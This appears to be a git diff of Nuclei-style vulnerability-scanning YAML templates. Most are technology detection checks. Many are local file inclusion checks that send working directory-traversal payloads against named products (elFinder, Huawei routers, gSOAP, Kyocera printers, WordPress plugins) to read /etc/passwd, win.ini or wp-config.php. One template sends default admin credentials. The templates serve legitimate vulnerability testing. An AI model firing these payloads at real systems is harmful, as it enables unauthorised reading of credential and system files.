Dialog Handler. reference: - https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html - https://github.com/bao7uo/dp_crypto @@ -28,6 +29,7 @@ requests: - '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1' + - '{{BaseURL}}/Telerik.Web.UI.DialogHandler.axd?dp=1' stop-at-first-match: true matchers-condition: and @@ -38,3 +40,5 @@ requests: - type: word words: - 'Invalid length for a Base-64 char array' + +# Enhanced by cs on 2022/02/28 diff --git a/poc/detect/terraform-detect-10708.yaml b/poc/detect/terraform-detect-10708.yaml index 2ba8d1cd70..4a458c77e2 100644 --- a/poc/detect/terraform-detect-10708.yaml +++ b/poc/detect/terraform-detect-10708.yaml @@ -1,22 +1,26 @@ id: terraform-detect + info: name: Detect Terraform Provider author: geeknik description: Write Infrastructure as Code - https://www.terraform.io/ severity: info tags: tech,terraform + requests: - method: GET path: - "{{BaseURL}}/provider.tf" + matchers-condition: and matchers: - type: word part: body words: - - "access_key" - - "terraform" + - access_key + - terraform condition: and + - type: status status: - 200 diff --git a/poc/detect/thinkcmf-detection-10719.yaml b/poc/detect/thinkcmf-detection-10719.yaml index 6cc404174d..31fc287821 100644 --- a/poc/detect/thinkcmf-detection-10719.yaml +++ b/poc/detect/thinkcmf-detection-10719.yaml @@ -1,25 +1,20 @@ id: thinkcmf-detection - info: name: ThinkCMF Detection author: pikpikcu severity: info tags: thinkcmf - requests: - method: GET path: - - "{{BaseURL}}" - + - "{{BaseURL}}/" matchers-condition: and matchers: - - type: word words: - "X-Powered-By: ThinkCMF" part: header condition: and - - type: status status: - 200 diff --git a/poc/detect/tomcat-detect-10794.yaml b/poc/detect/tomcat-detect-10794.yaml index a458250d43..bf98e742d9 100644 --- a/poc/detect/tomcat-detect-10794.yaml +++ b/poc/detect/tomcat-detect-10794.yaml @@ -1,36 +1,31 @@ id: tomcat-detect - info: name: Tomcat Detection author: philippedelteil,dhiyaneshDk - severity: info description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version. + severity: info + tags: tech,tomcat,apache metadata: shodan-query: title:"Apache Tomcat" - tags: tech,tomcat,apache - requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/{{randstr}}" - stop-at-first-match: true matchers-condition: or matchers: - type: dsl dsl: - 'contains(tolower(all_headers), "tomcat")' - - type: dsl dsl: - 'contains(tolower(body), "apache tomcat")' - 'contains(tolower(body), "/manager/html")' - 'contains(tolower(body), "/manager/status")' condition: or - extractors: - type: regex group: 1 regex: - - '(?i)Apache Tomcat.*([0-9]\.[0-9]+\.[0-9]+)' \ No newline at end of file + - '(?i)Apache Tomcat.*([0-9]\.[0-9]+\.[0-9]+)' diff --git a/poc/detect/vsftpd-detection-11074.yaml b/poc/detect/vsftpd-detection-11074.yaml index 0b88e35f61..f868bfffa9 100644 --- a/poc/detect/vsftpd-detection-11074.yaml +++ b/poc/detect/vsftpd-detection-11074.yaml @@ -14,7 +14,7 @@ info: tags: network,vsftpd,ftp,backdoor network: - inputs: - - data: "USER anonymous\r\nPASS anonymous\r\n" + - data: "USER anonymous\r\nPASS pussycat0x\r\n" host: - "{{Host}}:21" - "{{Hostname}}" diff --git a/poc/detect/wamp-xdebug-detect-11101.yaml b/poc/detect/wamp-xdebug-detect-11101.yaml index 2f31f0a8c3..539a94654d 100644 --- a/poc/detect/wamp-xdebug-detect-11101.yaml +++ b/poc/detect/wamp-xdebug-detect-11101.yaml @@ -1,18 +1,14 @@ id: wamp-xdebug-detect - info: name: WAMP xdebug author: e_schultze_ severity: info - reference: - - https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py - tags: debug,config,wamp - + # Inspired on https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py + # Goal: detect if xdebug.remote_connect_back is enabled requests: - method: GET path: - "{{BaseURL}}/?phpinfo=-1" - matchers: - type: word words: diff --git a/poc/detect/wazuh-detect-11112.yaml b/poc/detect/wazuh-detect-11112.yaml index 2961a8e89c..7aa27898c8 100644 --- a/poc/detect/wazuh-detect-11112.yaml +++ b/poc/detect/wazuh-detect-11112.yaml @@ -1,5 +1,4 @@ id: wazuh-detect - info: name: wazuh detect author: cyllective @@ -8,12 +7,10 @@ info: tags: tech,wazuh reference: - https://github.com/wazuh/wazuh - requests: - method: GET path: - "{{BaseURL}}/app/login" - matchers: - type: word part: body diff --git a/poc/detect/weave-scope-dashboard-detect-11118.yaml b/poc/detect/weave-scope-dashboard-detect-11118.yaml index 52524762b7..a8a2d39725 100644 --- a/poc/detect/weave-scope-dashboard-detect-11118.yaml +++ b/poc/detect/weave-scope-dashboard-detect-11118.yaml @@ -3,6 +3,7 @@ info: name: Weave Scope Dashboard author: e_schultze_ severity: info + tags: panel requests: - method: GET path: diff --git a/poc/detect/web-suite-detect-11167.yaml b/poc/detect/web-suite-detect-11167.yaml index 33bf8280f2..51ea564b42 100644 --- a/poc/detect/web-suite-detect-11167.yaml +++ b/poc/detect/web-suite-detect-11167.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: info metadata: - fofa-query: "Web Suite 2021 Login" + fofa-query: Web Suite 2021 Login tags: tech,web-suite requests: diff --git a/poc/detect/weblogic-detect-11142.yaml b/poc/detect/weblogic-detect-11142.yaml index d50d670388..34fc69e440 100644 --- a/poc/detect/weblogic-detect-11142.yaml +++ b/poc/detect/weblogic-detect-11142.yaml @@ -1,13 +1,26 @@ id: weblogic-detect + info: name: Detect Weblogic - author: bing0o + author: pdteam severity: info + metadata: + shodan-query: product:"Oracle Weblogic" + tags: tech,weblogic + requests: - method: GET path: - - "{{BaseURL}}/console/login/LoginForm.jsp" + - "{{BaseURL}}/{{randstr}}" + + matchers-condition: and matchers: - type: word words: - - "WebLogic" + - "From RFC 2068" + - "Error 404--Not Found" + condition: and + + - type: status + status: + - 404 diff --git a/poc/detect/weblogic-t3-detect-11151.yaml b/poc/detect/weblogic-t3-detect-11151.yaml index b1a63e30be..fd503f75f3 100644 --- a/poc/detect/weblogic-t3-detect-11151.yaml +++ b/poc/detect/weblogic-t3-detect-11151.yaml @@ -1,7 +1,7 @@ id: weblogic-t3-detect info: name: Detect Weblogic T3 Protocol - author: F1tz + author: F1tz,milo2012,wdahlenb severity: info description: Check T3 protocol status. tags: network,weblogic @@ -15,3 +15,24 @@ network: - type: word words: - "HELO" + extractors: + - type: regex + part: body + group: 1 + regex: + - "HELO:(.*).false" + - inputs: + - data: "t3s 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + host: + - "tls://{{Hostname}}" + read-size: 1024 + matchers: + - type: word + words: + - "HELO" + extractors: + - type: regex + part: body + group: 1 + regex: + - "HELO:(.*).false" diff --git a/poc/detect/wordpress-detect-11260.yaml b/poc/detect/wordpress-detect-11260.yaml index cfe326be4c..46ea04ff2b 100644 --- a/poc/detect/wordpress-detect-11260.yaml +++ b/poc/detect/wordpress-detect-11260.yaml @@ -1,25 +1,30 @@ id: wordpress-detect + info: name: WordPress Detection author: pdteam severity: info - tags: tech,wordpress metadata: shodan-query: http.component:"WordPress" + tags: tech,wordpress + requests: - method: GET path: - "{{BaseURL}}" + redirects: true max-redirects: 2 matchers-condition: or matchers: + - type: regex regex: - ']+s\d+\.wp\.com' - ' in file" - - type: status - status: - - 500 - type: word part: header words: - "text/html" + - type: status + status: + - 500 diff --git a/poc/local_file_inclusion/diarise-theme-lfi-6990.yaml b/poc/local_file_inclusion/diarise-theme-lfi-6990.yaml index 4934d58815..5de84b7d2e 100644 --- a/poc/local_file_inclusion/diarise-theme-lfi-6990.yaml +++ b/poc/local_file_inclusion/diarise-theme-lfi-6990.yaml @@ -1,12 +1,15 @@ id: diarise-theme-lfi info: - name: WordPress Diarise 1.5.9 Local File Disclosure + name: WordPress Diarise 1.5.9 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: WordPress Diarise theme version 1.5.9 suffers from a local file disclosure vulnerability. + description: WordPress Diarise theme version 1.5.9 suffers from a local file retrieval vulnerability. reference: - https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html - https://cxsecurity.com/issue/WLB-2019050123 + - https://woocommerce.com/?aff=1790 + classification: + cwe-id: CWE-98 tags: wordpress,wp-theme,lfi requests: - method: GET @@ -20,3 +23,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/05 diff --git a/poc/local_file_inclusion/eibiz-lfi-7187.yaml b/poc/local_file_inclusion/eibiz-lfi-7187.yaml index bb1feac69e..255a4e3534 100644 --- a/poc/local_file_inclusion/eibiz-lfi-7187.yaml +++ b/poc/local_file_inclusion/eibiz-lfi-7187.yaml @@ -4,8 +4,7 @@ info: author: 0x_akoko severity: high description: An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter. - reference: - - https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html + reference: https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html tags: windows,lfi,eibiz requests: - method: GET diff --git a/poc/local_file_inclusion/elfinder-path-traversal(1).yaml b/poc/local_file_inclusion/elfinder-path-traversal(1).yaml index fd0d19032e..e105773fc0 100644 --- a/poc/local_file_inclusion/elfinder-path-traversal(1).yaml +++ b/poc/local_file_inclusion/elfinder-path-traversal(1).yaml @@ -1,37 +1,27 @@ id: elFinder-path-traversal - info: - name: elFinder <=2.1.12 - Local File Inclusion + name: elFinder - Path Traversal author: ritikchaddha severity: high description: | - elFinder through 2.1.12 is vulnerable to local file inclusion via Connector.minimal.php in std42. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. + Connector.minimal.php in std42 elFinder through 2.1.12 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. reference: - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html metadata: verified: true shodan-query: title:"elfinder" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: lfi,elfinder - requests: - raw: - | GET /php/connector.minimal.php?cmd=file&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk&download=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - - type: status status: - 200 - -# Enhanced by mp on 2022/07/26 diff --git a/poc/local_file_inclusion/elfinder-version-7205.yaml b/poc/local_file_inclusion/elfinder-version-7205.yaml index 61068856c5..0ba73648e9 100644 --- a/poc/local_file_inclusion/elfinder-version-7205.yaml +++ b/poc/local_file_inclusion/elfinder-version-7205.yaml @@ -1,11 +1,16 @@ id: elfinder-version info: - name: elFinder version extractor + name: elFinder 2.1.58 - Remote Code Execution author: idealphase - severity: info - description: elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication. + severity: critical + description: elFinder 2.1.58 is vulnerable to remote code execution. This can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. + remediation: The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication. reference: - https://github.com/Studio-42/elFinder/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: tech,elfinder,oss requests: - method: GET @@ -29,3 +34,5 @@ requests: regex: - '\* Version (.+) \(' - "elFinder.prototype.version = '([0-9.]+)';" + +# Enhanced by mp on 2022/07/22 diff --git a/poc/local_file_inclusion/generic-linux-lfi-7588.yaml b/poc/local_file_inclusion/generic-linux-lfi-7588.yaml index db8a2f11fa..257fc77cb8 100644 --- a/poc/local_file_inclusion/generic-linux-lfi-7588.yaml +++ b/poc/local_file_inclusion/generic-linux-lfi-7588.yaml @@ -1,13 +1,9 @@ id: generic-linux-lfi info: - name: Generic Linux - Local File Inclusion + name: Generic Linux based LFI Test author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley severity: high - description: Generic Linux is subject to local file Inclusion on searches for /etc/passwd on passed URLs. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + description: Searches for /etc/passwd on passed URLs tags: linux,lfi,generic requests: - method: GET @@ -41,5 +37,3 @@ requests: regex: - "root:.*:0:0:" part: body - -# Enhanced by mp on 2022/07/22 diff --git a/poc/local_file_inclusion/generic-windows-lfi-7592.yaml b/poc/local_file_inclusion/generic-windows-lfi-7592.yaml index f91fbe4dd3..5297d77088 100644 --- a/poc/local_file_inclusion/generic-windows-lfi-7592.yaml +++ b/poc/local_file_inclusion/generic-windows-lfi-7592.yaml @@ -1,14 +1,12 @@ id: generic-windows-lfi + info: - name: Windows - Local File Inclusion + name: Generic Windows based LFI Test author: mesaglio,sushantkamble severity: high - description: Windows is vulnerable to local file inclusion because of searches for /windows/win.ini on passed URLs. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + description: Searches for /windows/win.ini on passed URLs tags: azure,windows,lfi,generic + requests: - method: GET path: @@ -22,6 +20,7 @@ requests: - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini" - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini" - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini" + stop-at-first-match: true matchers: - type: word @@ -31,5 +30,3 @@ requests: - "extensions" condition: and part: body - -# Enhanced by mp on 2022/07/22 diff --git a/poc/local_file_inclusion/geovision-geowebserver-lfi-7597.yaml b/poc/local_file_inclusion/geovision-geowebserver-lfi-7597.yaml index 8d17388031..6f8dc53b3e 100644 --- a/poc/local_file_inclusion/geovision-geowebserver-lfi-7597.yaml +++ b/poc/local_file_inclusion/geovision-geowebserver-lfi-7597.yaml @@ -1,15 +1,11 @@ id: geowebserver-lfi info: - name: GeoVision Geowebserver 5.3.3 - Local File Inclusion + name: GeoVision Geowebserver 5.3.3 - LFI author: madrobot severity: high - description: GeoVision Geowebserver 5.3.3 allows remote unauthenticated attackers to disclose the content of locally stored files via local file inclusion. + description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files. reference: - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: geowebserver,lfi requests: - method: GET @@ -28,5 +24,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/27 diff --git a/poc/local_file_inclusion/global-domains-lfi-7714.yaml b/poc/local_file_inclusion/global-domains-lfi-7714.yaml index 1b79e26900..82c1162862 100644 --- a/poc/local_file_inclusion/global-domains-lfi-7714.yaml +++ b/poc/local_file_inclusion/global-domains-lfi-7714.yaml @@ -3,8 +3,10 @@ info: name: Global Domains International Directory traversal Vulnerability author: 0x_Akoko severity: high - reference: https://cxsecurity.com/issue/WLB-2018020247 - tags: globaldomains,lfi + reference: + - https://cxsecurity.com/issue/WLB-2018020247 + - http://www.nic.ws + tags: globaldomains,lfi,traversal requests: - method: GET path: diff --git a/poc/local_file_inclusion/goip-1-lfi-7764.yaml b/poc/local_file_inclusion/goip-1-lfi-7764.yaml index 3d37e740f4..ec758063cf 100644 --- a/poc/local_file_inclusion/goip-1-lfi-7764.yaml +++ b/poc/local_file_inclusion/goip-1-lfi-7764.yaml @@ -1,5 +1,4 @@ id: goip-1-lfi - info: name: GoIP-1 GSM - Local File Inclusion author: gy741 @@ -9,14 +8,12 @@ info: - https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/ - http://www.hybertone.com/uploadfile/download/20140304125509964.pdf - http://en.dbltek.com/latestfirmwares.html - tags: gsm,goip,lfi,iot - + tags: gsm,goip,lfi requests: - method: GET path: - - "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - - "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - + - "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f ..%2f..%2f..%2f..%2fetc%2fpasswd" + - "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f ..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" matchers: - type: regex regex: diff --git a/poc/local_file_inclusion/groupoffice-lfi-7849.yaml b/poc/local_file_inclusion/groupoffice-lfi-7849.yaml index 4169a20e18..142e511ab2 100644 --- a/poc/local_file_inclusion/groupoffice-lfi-7849.yaml +++ b/poc/local_file_inclusion/groupoffice-lfi-7849.yaml @@ -1,28 +1,26 @@ id: groupoffice-lfi + info: - name: Groupoffice 3.4.21 - Local File Inclusion + name: Groupoffice 3.4.21 Directory Traversal Vulnerability author: 0x_Akoko severity: high - description: Groupoffice 3.4.21 is vulnerable to local file inclusion. reference: - https://cxsecurity.com/issue/WLB-2018020249 - http://www.group-office.com - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: groupoffice,lfi,traversal + requests: - method: GET path: - "{{BaseURL}}/compress.php?file=../../../../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/07/27 diff --git a/poc/local_file_inclusion/gsoap-lfi-7857.yaml b/poc/local_file_inclusion/gsoap-lfi-7857.yaml index e679dee126..44a1179f7b 100644 --- a/poc/local_file_inclusion/gsoap-lfi-7857.yaml +++ b/poc/local_file_inclusion/gsoap-lfi-7857.yaml @@ -1,28 +1,19 @@ id: gsoap-lfi - info: name: gSOAP 2.8 - Directory Traversal author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/47653 tags: gsoap,lfi - requests: - - raw: - - | - GET /../../../../../../../../../etc/passwd HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 - Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close - + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../etc/passwd" matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/local_file_inclusion/hb-audio-lfi-7911.yaml b/poc/local_file_inclusion/hb-audio-lfi-7911.yaml index 6e01346501..54b233329d 100644 --- a/poc/local_file_inclusion/hb-audio-lfi-7911.yaml +++ b/poc/local_file_inclusion/hb-audio-lfi-7911.yaml @@ -1,9 +1,10 @@ id: hb-audio-lfi info: - name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download + name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Retrieval author: dhiyaneshDK severity: high - reference: https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html + reference: + - https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html metadata: google-dork: inurl:/wp-content/plugins/hb-audio-gallery-lite tags: wordpress,wp-plugin,lfi,wp diff --git a/poc/local_file_inclusion/hide-security-enhancer-lfi-7951.yaml b/poc/local_file_inclusion/hide-security-enhancer-lfi-7951.yaml index 44eb6c940c..003dee02ce 100644 --- a/poc/local_file_inclusion/hide-security-enhancer-lfi-7951.yaml +++ b/poc/local_file_inclusion/hide-security-enhancer-lfi-7951.yaml @@ -1,21 +1,24 @@ id: hide-security-enhancer-lfi + info: name: WordPress Hide Security Enhancer 1.3.9.2 Local File Inclusion author: dhiyaneshDK severity: high description: WordPress Hide Security Enhancer version 1.3.9.2 or less is susceptible to a local file inclusion vulnerability which could allow malicious visitors to download any file in the installation. - remediation: Upgrade to version 1.4 or later. - reference: https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/ + reference: + - https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 - cve-id: cwe-id: CWE-22 + remediation: Upgrade to version 1.4 or later. tags: wordpress,wp-plugin,lfi,wp + requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php' + matchers-condition: and matchers: - type: word @@ -24,6 +27,7 @@ requests: - "DB_NAME" - "DB_PASSWORD" condition: and + - type: status status: - 200 diff --git a/poc/local_file_inclusion/hrsale-unauthenticated-lfi-8041.yaml b/poc/local_file_inclusion/hrsale-unauthenticated-lfi-8041.yaml index a75b0f101b..c30bf2123a 100644 --- a/poc/local_file_inclusion/hrsale-unauthenticated-lfi-8041.yaml +++ b/poc/local_file_inclusion/hrsale-unauthenticated-lfi-8041.yaml @@ -4,8 +4,7 @@ info: author: 0x_Akoko severity: high description: This exploit allow you to download any readable file from server without permission and login session - reference: - - https://www.exploit-db.com/exploits/48920 + reference: https://www.exploit-db.com/exploits/48920 tags: hrsale,lfi requests: - method: GET diff --git a/poc/local_file_inclusion/huawei-hg255s-lfi-8061.yaml b/poc/local_file_inclusion/huawei-hg255s-lfi-8061.yaml index 0c1cff2daf..db9c17c5df 100644 --- a/poc/local_file_inclusion/huawei-hg255s-lfi-8061.yaml +++ b/poc/local_file_inclusion/huawei-hg255s-lfi-8061.yaml @@ -1,16 +1,11 @@ id: huawei-hg255s-lfi info: - name: Huawei HG255s - Local File Inclusion + name: Huawei HG255s - Directory Traversal author: 0x_Akoko severity: high - description: Huawei HG255s is vulnerable to local file inclusion due to insufficient validation of the received HTTP requests. A remote attacker may access the local files on the device without authentication. reference: - https://cxsecurity.com/issue/WLB-2017090053 - https://www.youtube.com/watch?v=n02toTFkLOU - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 metadata: shodan-query: http.html:"HG532e" tags: huawei,lfi,router @@ -26,5 +21,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/22 diff --git a/poc/local_file_inclusion/huawei-hg659-lfi-8070.yaml b/poc/local_file_inclusion/huawei-hg659-lfi-8070.yaml index 218c72de11..9848bc2218 100644 --- a/poc/local_file_inclusion/huawei-hg659-lfi-8070.yaml +++ b/poc/local_file_inclusion/huawei-hg659-lfi-8070.yaml @@ -1,28 +1,26 @@ id: huawei-hg659-lfi + info: - name: HUAWEI HG659 - Local File Inclusion + name: HUAWEI HG659 LFI author: pikpikcu severity: high - description: HUAWEI HG659 is vulnerable to local file inclusion. reference: - https://twitter.com/sec715/status/1406782172443287559 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: lfi,huawei + requests: - method: GET path: - "{{BaseURL}}/lib///....//....//....//....//....//....//....//....//etc//passwd" + matchers-condition: and matchers: + - type: regex regex: - "root:.*:0:0:" condition: and + - type: status status: - 200 - -# Enhanced by mp on 2022/08/03 diff --git a/poc/local_file_inclusion/ibm-infoprint-lfi-8101.yaml b/poc/local_file_inclusion/ibm-infoprint-lfi-8101.yaml index f9fbad5322..899fad8ae8 100644 --- a/poc/local_file_inclusion/ibm-infoprint-lfi-8101.yaml +++ b/poc/local_file_inclusion/ibm-infoprint-lfi-8101.yaml @@ -1,11 +1,14 @@ id: ibm-infoprint-lfi + info: name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal author: harshbothra_ severity: medium description: Directory traversal vulnerability on IBM InfoPrint 4247-Z03 Impact Matrix Printer. - reference: https://www.exploit-db.com/exploits/47835 + reference: + - https://www.exploit-db.com/exploits/47835 tags: ibm,lfi,matrix,printer + requests: - method: GET path: diff --git a/poc/local_file_inclusion/issuu-panel-lfi-8200.yaml b/poc/local_file_inclusion/issuu-panel-lfi-8200.yaml index cb5dc825aa..46a775efd6 100644 --- a/poc/local_file_inclusion/issuu-panel-lfi-8200.yaml +++ b/poc/local_file_inclusion/issuu-panel-lfi-8200.yaml @@ -1,20 +1,33 @@ id: issuu-panel-lfi + info: - name: Wordpress Plugin Issuu Panel - RFI & LFI + name: Wordpress Plugin Issuu Panel Remote/Local File Inclusion author: 0x_Akoko severity: high description: The WordPress Issuu Plugin includes an arbitrary file disclosure vulnerability that allows unauthenticated attackers to disclose the content of local and remote files. - reference: https://cxsecurity.com/issue/WLB-2016030131 + reference: + - https://cxsecurity.com/issue/WLB-2016030131 + - https://wordpress.org/plugins/issuu-panel/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 tags: wp-plugin,wordpress,lfi,rfi + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd" + matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 + +# Enhanced by mp on 2022/03/29 diff --git a/poc/local_file_inclusion/jinfornet-jreport-lfi-8309.yaml b/poc/local_file_inclusion/jinfornet-jreport-lfi-8309.yaml index 33c359624a..c25375a9bb 100644 --- a/poc/local_file_inclusion/jinfornet-jreport-lfi-8309.yaml +++ b/poc/local_file_inclusion/jinfornet-jreport-lfi-8309.yaml @@ -1,28 +1,19 @@ id: jinfornet-jreport-lfi - info: name: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal author: 0x_Akoko severity: high - description: Jreport Help function have a path traversal vulnerability in the SendFileServlet allows remote unauthenticated users to view any files on the Operating System with Application services user permission. - This vulnerability affects Windows and Unix operating systems. - reference: - - https://cxsecurity.com/issue/WLB-2020030151 - - https://www.jinfonet.com/product/download-jreport/ + reference: https://cxsecurity.com/issue/WLB-2020030151 tags: jreport,jinfornet,lfi - requests: - method: GET path: - "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd" - matchers-condition: and matchers: - type: regex - part: body regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/local_file_inclusion/karel-ip-phone-lfi-8438.yaml b/poc/local_file_inclusion/karel-ip-phone-lfi-8438.yaml index cf9a777485..2edc23b8f0 100644 --- a/poc/local_file_inclusion/karel-ip-phone-lfi-8438.yaml +++ b/poc/local_file_inclusion/karel-ip-phone-lfi-8438.yaml @@ -3,17 +3,12 @@ info: name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal author: 0x_Akoko severity: high - description: A vulnerability in the Karel IP Phone IP1211 Web Management Panel allows remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter. - reference: - - https://cxsecurity.com/issue/WLB-2020100038 - - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon + reference: https://cxsecurity.com/issue/WLB-2020100038 tags: karel,lfi requests: - method: GET path: - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd" - headers: - Authorization: Basic YWRtaW46YWRtaW4= matchers-condition: and matchers: - type: regex diff --git a/poc/local_file_inclusion/kyocera-m2035dn-lfi-8557.yaml b/poc/local_file_inclusion/kyocera-m2035dn-lfi-8557.yaml index 3dfc09dda7..35651ada5b 100644 --- a/poc/local_file_inclusion/kyocera-m2035dn-lfi-8557.yaml +++ b/poc/local_file_inclusion/kyocera-m2035dn-lfi-8557.yaml @@ -1,22 +1,26 @@ id: kyocera-m2035dn-lfi + info: - name: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) + name: Kyocera Command Center RX ECOSYS M2035dn - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) + description: Kyocera Command Center RX ECOSYS M2035dn - Unauthenticated arbitrary file retrieval. reference: - https://www.exploit-db.com/exploits/50738 - https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html tags: printer,iot,kyocera,lfi + requests: - method: GET path: - "{{BaseURL}}/js/../../../../../../../../etc/passwd%00.jpg" + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 diff --git a/poc/local_file_inclusion/laravel-filemanager-lfi-8588.yaml b/poc/local_file_inclusion/laravel-filemanager-lfi-8588.yaml new file mode 100644 index 0000000000..04b9fbf36c --- 